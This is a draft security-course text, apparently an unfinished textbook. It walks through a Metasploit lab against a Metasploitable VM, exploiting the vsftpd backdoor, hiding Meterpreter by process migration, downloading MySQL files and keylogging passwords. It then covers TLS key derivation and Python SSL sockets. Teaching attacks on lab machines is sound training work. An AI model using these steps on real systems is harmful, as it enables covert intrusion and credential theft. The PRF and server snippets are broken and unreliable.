Chapter 13 Metasploit

13.1 Background

Metasploit is a framework that is Developed by Rapid 7. This section we will walk throught the step that an attacker would take to use to break into webserver and database containing the passwords for the website.

13.2 Using Exploits

Step 1 Start up the metasploitable virtual machine. (This machine that will be webserver that we attack in the this excersize and get the IPaddress of metasploitable machine by logging in use username: msfadmin, password: msfadmin. And get the IPaddress by running the ifconfig command. Write it down you need to remember it for the next step.

[Include Screen Shot]

Step 2 Click on the Metasploit Icon [Include picture]

[Include screen shot Metasploit Console]

Step 3 Metasploit Framework is comprised of collection of modules. These modules contain code that is designed execute a particlar exploit. In this next labs we explore how the modules are implemented by implementing our own module for this lab we will use an existing module in metasploit. We will begin by loading the module that execute the ftp exploit module (This will execute the attack from 2 chapter)

use exploit/unix/ftp/vsftpd_234_backdoor

[include screen shot]

Step 4 Next you want to set the IP-address of the target that you want to attack.

set TARGET <target-id>

Step 4 Run the command below to use the exploit and upload the metasploit payload (Metrepreter):

exploit

[include screenshot ]

13.3 Hide metrepreter process by migrating it.

Once the hacker has upload a metasploitable payload they don’t the user to notice the process and kill it so often the hide the metrepreter process by migrating it.

Step 5 Get a list of the process by running the ps command ps [include screenshot]

Step 6 The process by migrating by running

migrate 682 [Update to match a process in the list]

13.4 Exploring the file system

Great now that you have ran the exploit and uploaded the metasploit payload you should have a reverse shell lets you exploire the file system on the webserver.

Step 5 Run the pwd command. Notice that it prints the current directory of the program.

[include screenshot]

Step 6 Navigate to directory containing the database file by running the following command

cd /var/lib/mysql/ [include screenshot]

Step 7 Download one of the database files by running the command below:

download [filename] [Include screen shot]

13.5 Key Logging

Great you have been able to sucesfully get the database file from the system. But you don’t know the admin password for the system. This would make really convient for login back into the system, an even other systems without creating to much noise.

[Metasploit only does keylogging for the process that you are currently in. ] Step 8 Install a keylogger so that you can collect the usernames and password from the system. By running the



[Include Screen shot]


**Step 9** Test the keylogger by logging into the metasploitable virtual machine and running the sudo command. (Username: msfadmin, password: msfadmin)

[Include screenshot]


**Step 7** Open the window containing the meterpeter session. Run the command ```keyscan_dump``. Notice anything? 
[Include screenshot below]















<!--chapter:end:14-Metasploit.Rmd-->

#Writing a Metasploit module


##Background 


##Setup 
**Setup 1** Open the terminal and navigate to the metasploit directory by running the
```cd ~/.msf4/modules```


**Step 2** Open Visual studio code. (If you haven't )

<!--chapter:end:15-WritingAMetasploitModule.Rmd-->

# Secure Sockets SSL and TLS


## Background 
In this section we discuss the TLS security protocol in detail. We will go through the protocol in detail we also use wireshark to look at sample TLS session. For additonal details on TLS you can read the TLS formal specification https://tools.ietf.org/html/rfc5246#section-8.1.2. 



### Key Exchange. 


###How are keys derived from the Pre-Master Secret. 
The length of the pre-master secret varies depending on type of key exchange algorithm that is used. However, to ensure that the message is both authentic and confidential a fix length messsage autheication code key and fix length messsage encryption key. We need these keys for both the client and server.  TLS solves issue by deriving the fix length master secret from a variable lenght pre-master secret. 

```python

master_secret = PRF(pre_master_secret, "master secret",
                    ClientHello.random + ServerHello.random)
                    [0..47];
                    

The code below shows a sample python program that implements the PRF function above:

This master_secret key is the cutup into 4 keys:

client_write_MAC_key[SecurityParameters.mac_key_length] server_write_MAC_key[SecurityParameters.mac_key_length] client_write_key[SecurityParameters.enc_key_length] server_write_key[SecurityParameters.enc_key_length]


PRF(secret, label, seed) = P_<hash>(secret, label + seed)


P_hash(secret, seed) = HMAC_hash(secret, A(1) + seed) +
                             HMAC_hash(secret, A(2) + seed) +
                             HMAC_hash(secret, A(3) + seed) + ...

   where + indicates concatenation.
A() is defined as:

      A(0) = seed
      A(i) = HMAC_hash(secret, A(i-1))

HMAC = Hash-based Message Authentication Code.


def PRF(secret, label, seed)
  requireLength = 48
  masterkey = ''
  secSeed = label + seed
  while(len(masterkey) <- 48):
    secSeed = hmac.new(secret,secSeed).hexdigest()
    masterkey += secSeed

  return masterkey

13.6 Writing a SSL Client

import socket 
import ssl 

hostname = 'www.python.org'
context = ssl.create_default_context() 
sock = socket.create_connection((hostname, 443))  
secureSocket = context.wrap_socket(sock, server_hostname=hostname) 
print(secureSocket.recvfrom(1024))

##Writing an SSL server


context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
context.load_cert_chain('/path/to/certchain.pem', '/path/to/private.key') 
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0) 
sock.bind(('127.0.0.1', 8443)) 
sock.listen(1) 
secureSocket= context.wrap_socket(sock, server_side=True)
conn, addr = ssock.accept()

13.7 Challenge

Now that you have we discussed TLS you can try running SMTP spoof over a TLS connection.